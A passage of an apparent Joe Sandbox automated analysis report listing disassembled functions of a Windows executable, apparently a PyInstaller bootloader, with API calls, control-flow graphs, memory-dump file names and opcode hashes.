                                                                                                                                                                                                        • Part of subcall function 00007FF7FF582C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FF583706,?,00007FF7FF583804), ref: 00007FF7FF582C9E
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF582C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FF583706,?,00007FF7FF583804), ref: 00007FF7FF582D63
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF582C50: MessageBoxW.USER32 ref: 00007FF7FF582D99
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                      • API String ID: 3187769757-2863816727
                                                                                                                                                                                                      • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                      • Instruction ID: f5f5644522468bfb6c97155f5e32020bca623684ed21aa1b6ac219ac407b73c0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4218391B19AC251FB20BB24E8043F6A290BF48755FC40332D57EC35E5EE2CE604C7A0
                                                                                                                                                                                                      Function 00007FF7FF59BACC Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 744 7ff7ff59bacc-7ff7ff59baf2 745 7ff7ff59baf4-7ff7ff59bb08 call 7ff7ff594f58 call 7ff7ff594f78 744->745 746 7ff7ff59bb0d-7ff7ff59bb11 744->746 760 7ff7ff59befe 745->760 748 7ff7ff59bee7-7ff7ff59bef3 call 7ff7ff594f58 call 7ff7ff594f78 746->748 749 7ff7ff59bb17-7ff7ff59bb1e 746->749 767 7ff7ff59bef9 call 7ff7ff59a950 748->767 749->748 751 7ff7ff59bb24-7ff7ff59bb52 749->751 751->748 754 7ff7ff59bb58-7ff7ff59bb5f 751->754 757 7ff7ff59bb61-7ff7ff59bb73 call 7ff7ff594f58 call 7ff7ff594f78 754->757 758 7ff7ff59bb78-7ff7ff59bb7b 754->758 757->767 763 7ff7ff59bb81-7ff7ff59bb87 758->763 764 7ff7ff59bee3-7ff7ff59bee5 758->764 765 7ff7ff59bf01-7ff7ff59bf18 760->765 763->764 768 7ff7ff59bb8d-7ff7ff59bb90 763->768 764->765 767->760 768->757 769 7ff7ff59bb92-7ff7ff59bbb7 768->769 772 7ff7ff59bbea-7ff7ff59bbf1 769->772 773 7ff7ff59bbb9-7ff7ff59bbbb 769->773 777 7ff7ff59bbf3-7ff7ff59bc1b call 7ff7ff59d66c call 7ff7ff59a9b8 * 2 772->777 778 7ff7ff59bbc6-7ff7ff59bbdd call 7ff7ff594f58 call 7ff7ff594f78 call 7ff7ff59a950 772->778 775 7ff7ff59bbe2-7ff7ff59bbe8 773->775 776 7ff7ff59bbbd-7ff7ff59bbc4 773->776 780 7ff7ff59bc68-7ff7ff59bc7f 775->780 776->775 776->778 805 7ff7ff59bc38-7ff7ff59bc63 call 7ff7ff59c2f4 777->805 806 7ff7ff59bc1d-7ff7ff59bc33 call 7ff7ff594f78 call 7ff7ff594f58 777->806 809 7ff7ff59bd70 778->809 783 7ff7ff59bc81-7ff7ff59bc89 780->783 784 7ff7ff59bcfa-7ff7ff59bd04 call 7ff7ff5a398c 780->784 783->784 788 7ff7ff59bc8b-7ff7ff59bc8d 783->788 796 7ff7ff59bd0a-7ff7ff59bd1f 784->796 797 7ff7ff59bd8e 784->797 788->784 793 7ff7ff59bc8f-7ff7ff59bca5 788->793 793->784 798 7ff7ff59bca7-7ff7ff59bcb3 793->798 796->797 803 7ff7ff59bd21-7ff7ff59bd33 GetConsoleMode 796->803 801 7ff7ff59bd93-7ff7ff59bdb3 ReadFile 797->801 798->784 799 7ff7ff59bcb5-7ff7ff59bcb7 798->799 799->784 804 7ff7ff59bcb9-7ff7ff59bcd1 799->804 807 7ff7ff59bdb9-7ff7ff59bdc1 801->807 808 7ff7ff59bead-7ff7ff59beb6 GetLastError 801->808 803->797 810 7ff7ff59bd35-7ff7ff59bd3d 803->810 804->784 812 7ff7ff59bcd3-7ff7ff59bcdf 804->812 805->780 806->809 807->808 814 7ff7ff59bdc7 807->814 817 7ff7ff59bed3-7ff7ff59bed6 808->817 818 7ff7ff59beb8-7ff7ff59bece call 7ff7ff594f78 call 7ff7ff594f58 808->818 811 7ff7ff59bd73-7ff7ff59bd7d call 7ff7ff59a9b8 809->811 810->801 816 7ff7ff59bd3f-7ff7ff59bd61 ReadConsoleW 810->816 811->765 812->784 820 7ff7ff59bce1-7ff7ff59bce3 812->820 824 7ff7ff59bdce-7ff7ff59bde3 814->824 826 7ff7ff59bd82-7ff7ff59bd8c 816->826 827 7ff7ff59bd63 GetLastError 816->827 821 7ff7ff59bd69-7ff7ff59bd6b call 7ff7ff594eec 817->821 822 7ff7ff59bedc-7ff7ff59bede 817->822 818->809 820->784 831 7ff7ff59bce5-7ff7ff59bcf5 820->831 821->809 822->811 824->811 833 7ff7ff59bde5-7ff7ff59bdf0 824->833 826->824 827->821 831->784 837 7ff7ff59bdf2-7ff7ff59be0b call 7ff7ff59b6e4 833->837 838 7ff7ff59be17-7ff7ff59be1f 833->838 844 7ff7ff59be10-7ff7ff59be12 837->844 841 7ff7ff59be21-7ff7ff59be33 838->841 842 7ff7ff59be9b-7ff7ff59bea8 call 7ff7ff59b524 838->842 845 7ff7ff59be35 841->845 846 7ff7ff59be8e-7ff7ff59be96 841->846 842->844 844->811 847 7ff7ff59be3a-7ff7ff59be41 845->847 846->811 849 7ff7ff59be43-7ff7ff59be47 847->849 850 7ff7ff59be7d-7ff7ff59be88 847->850 851 7ff7ff59be63 849->851 852 7ff7ff59be49-7ff7ff59be50 849->852 850->846 854 7ff7ff59be69-7ff7ff59be79 851->854 852->851 853 7ff7ff59be52-7ff7ff59be56 852->853 853->851 855 7ff7ff59be58-7ff7ff59be61 853->855 854->847 856 7ff7ff59be7b 854->856 855->854 856->846
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: 71330427dde7a49afb2283bb308656113f98e0c66a4f806cd66398b14c9322eb
                                                                                                                                                                                                      • Instruction ID: 83fa90cfd8c71e74b13d55bcc48a617426c8c0bf2705065cbd80c80d8286db5e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71330427dde7a49afb2283bb308656113f98e0c66a4f806cd66398b14c9322eb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5C1B2229087CBA1F778AB1594402FDA764EB81B80F954331EA7E037E1CE7CE95583A0
                                                                                                                                                                                                      Function 00007FF7FF588760 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 995526605-0
                                                                                                                                                                                                      • Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                      • Instruction ID: 31d7f8be36e7431e17f9a85cd543db170859c106f42b0e6d533bb689fe0fbb5b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62217E21A0C68342EB10AB55F4942AAE7A0FB857A0F900735EABD47AE4DF6CD455CB90
                                                                                                                                                                                                      Function 00007FF7FF5890E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588760: GetCurrentProcess.KERNEL32 ref: 00007FF7FF588780
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588760: OpenProcessToken.ADVAPI32 ref: 00007FF7FF588793
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588760: GetTokenInformation.KERNELBASE ref: 00007FF7FF5887B8
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588760: GetLastError.KERNEL32 ref: 00007FF7FF5887C2
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588760: GetTokenInformation.KERNELBASE ref: 00007FF7FF588802
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7FF58881E
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588760: CloseHandle.KERNEL32 ref: 00007FF7FF588836
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00007FF7FF583C55), ref: 00007FF7FF58916C
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00007FF7FF583C55), ref: 00007FF7FF589175
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                      • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                      • API String ID: 6828938-1529539262
                                                                                                                                                                                                      • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                      • Instruction ID: 41f2051c5beebed55413ace6f294a047302673919fb108bd8f297b157899db18
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92213C21A096C282F710BB10E5152EAA6A0FF88780FC44235EA7D53BD6EF3CD805C7E0
                                                                                                                                                                                                      Function 00007FF7FF59CFD0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 963 7ff7ff59cfd0-7ff7ff59cff5 964 7ff7ff59d2c3 963->964 965 7ff7ff59cffb-7ff7ff59cffe 963->965 966 7ff7ff59d2c5-7ff7ff59d2d5 964->966 967 7ff7ff59d000-7ff7ff59d032 call 7ff7ff59a884 965->967 968 7ff7ff59d037-7ff7ff59d063 965->968 967->966 969 7ff7ff59d065-7ff7ff59d06c 968->969 970 7ff7ff59d06e-7ff7ff59d074 968->970 969->967 969->970 973 7ff7ff59d084-7ff7ff59d099 call 7ff7ff5a398c 970->973 974 7ff7ff59d076-7ff7ff59d07f call 7ff7ff59c390 970->974 978 7ff7ff59d09f-7ff7ff59d0a8 973->978 979 7ff7ff59d1b3-7ff7ff59d1bc 973->979 974->973 978->979 982 7ff7ff59d0ae-7ff7ff59d0b2 978->982 980 7ff7ff59d210-7ff7ff59d235 WriteFile 979->980 981 7ff7ff59d1be-7ff7ff59d1c4 979->981 983 7ff7ff59d240 980->983 984 7ff7ff59d237-7ff7ff59d23d GetLastError 980->984 985 7ff7ff59d1c6-7ff7ff59d1c9 981->985 986 7ff7ff59d1fc-7ff7ff59d20e call 7ff7ff59ca88 981->986 987 7ff7ff59d0b4-7ff7ff59d0bc call 7ff7ff594830 982->987 988 7ff7ff59d0c3-7ff7ff59d0ce 982->988 990 7ff7ff59d243 983->990 984->983 991 7ff7ff59d1e8-7ff7ff59d1fa call 7ff7ff59cca8 985->991 992 7ff7ff59d1cb-7ff7ff59d1ce 985->992 1006 7ff7ff59d1a0-7ff7ff59d1a7 986->1006 987->988 994 7ff7ff59d0d0-7ff7ff59d0d9 988->994 995 7ff7ff59d0df-7ff7ff59d0f4 GetConsoleMode 988->995 999 7ff7ff59d248 990->999 991->1006 1000 7ff7ff59d254-7ff7ff59d25e 992->1000 1001 7ff7ff59d1d4-7ff7ff59d1e6 call 7ff7ff59cb8c 992->1001 994->979 994->995 996 7ff7ff59d0fa-7ff7ff59d100 995->996 997 7ff7ff59d1ac 995->997 1004 7ff7ff59d106-7ff7ff59d109 996->1004 1005 7ff7ff59d189-7ff7ff59d19b call 7ff7ff59c610 996->1005 997->979 1007 7ff7ff59d24d 999->1007 1008 7ff7ff59d260-7ff7ff59d265 1000->1008 1009 7ff7ff59d2bc-7ff7ff59d2c1 1000->1009 1001->1006 1012 7ff7ff59d114-7ff7ff59d122 1004->1012 1013 7ff7ff59d10b-7ff7ff59d10e 1004->1013 1005->1006 1006->999 1007->1000 1015 7ff7ff59d293-7ff7ff59d29d 1008->1015 1016 7ff7ff59d267-7ff7ff59d26a 1008->1016 1009->966 1020 7ff7ff59d180-7ff7ff59d184 1012->1020 1021 7ff7ff59d124 1012->1021 1013->1007 1013->1012 1018 7ff7ff59d29f-7ff7ff59d2a2 1015->1018 1019 7ff7ff59d2a4-7ff7ff59d2b3 1015->1019 1022 7ff7ff59d283-7ff7ff59d28e call 7ff7ff594f34 1016->1022 1023 7ff7ff59d26c-7ff7ff59d27b 1016->1023 1018->964 1018->1019 1019->1009 1020->990 1024 7ff7ff59d128-7ff7ff59d13f call 7ff7ff5a3a58 1021->1024 1022->1015 1023->1022 1029 7ff7ff59d141-7ff7ff59d14d 1024->1029 1030 7ff7ff59d177-7ff7ff59d17d GetLastError 1024->1030 1031 7ff7ff59d14f-7ff7ff59d161 call 7ff7ff5a3a58 1029->1031 1032 7ff7ff59d16c-7ff7ff59d173 1029->1032 1030->1020 1031->1030 1036 7ff7ff59d163-7ff7ff59d16a 1031->1036 1032->1020 1034 7ff7ff59d175 1032->1034 1034->1024 1036->1032
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FF59CFBB), ref: 00007FF7FF59D0EC
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FF59CFBB), ref: 00007FF7FF59D177
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 953036326-0
                                                                                                                                                                                                      • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                      • Instruction ID: cef920b1496819e1980775ef83826ecafb258c76f2f942745081a0b4e0fbf0dd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2591E732F1869285F774AF6594402FDABA0BB40788F944235DE7E536D4EE3CD442C7A0
                                                                                                                                                                                                      Function 00007FF7FF595698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1279662727-0
                                                                                                                                                                                                      • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                      • Instruction ID: ec10dbd66422ca27fc0225f291d354a09a4ba7456042b811a98854b9adaadf99
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74419622D187C283E768AB2095503B9A3A0FB94794F509335E67C03ED1DF7CA5F187A0
                                                                                                                                                                                                      Function 00007FF7FF58CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3251591375-0
                                                                                                                                                                                                      • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                      • Instruction ID: ca1fae4b14fc585a347e055649a00323b0caa5b68d0e0ecf03e974bd0acde9c5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD313760E096C351FB24BB2594653F9AB92BF41784FC44634D97E4B2D3EE2CA409C2F0
                                                                                                                                                                                                      Function 00007FF7FF599AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                      • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                      • Instruction ID: db12c1a4249d1ec308ab5f48d1858cd141796b67297f7cd5fbbcd5117e5a6e2f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29D09E10F097C652EB283F705C990F8A651AF48745F941638C83B073E3ED6CA45943E0
                                                                                                                                                                                                      Function 00007FF7FF5901AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                      • Instruction ID: 0951bbb32cb433a8f0e7dd39feeb2b44c16743efb6b602f6ce011d5190385592
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0451E321B092D286FB7CAA7594006FAE691AF44BA4F984B34DE7C437C5CF3CE40586A0
                                                                                                                                                                                                      Function 00007FF7FF59C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
